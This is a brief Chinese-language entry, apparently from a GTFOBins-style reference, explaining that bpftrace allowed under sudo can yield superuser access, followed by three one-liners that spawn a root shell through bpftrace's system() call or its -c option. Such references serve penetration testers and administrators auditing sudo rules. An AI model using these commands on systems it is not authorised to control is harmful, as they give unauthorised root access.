如果二进制文件被 sudo 允许以超级用户身份运行,可能被用于访问文件系统、提升或维持特权访问。
sudo bpftrace -e 'BEGIN {system("/bin/sh");exit()}'TF=$(mktemp)
echo 'BEGIN {system("/bin/sh");exit()}' >$TF
sudo bpftrace $TF
sudo bpftrace -c /bin/sh -e 'END {exit()}'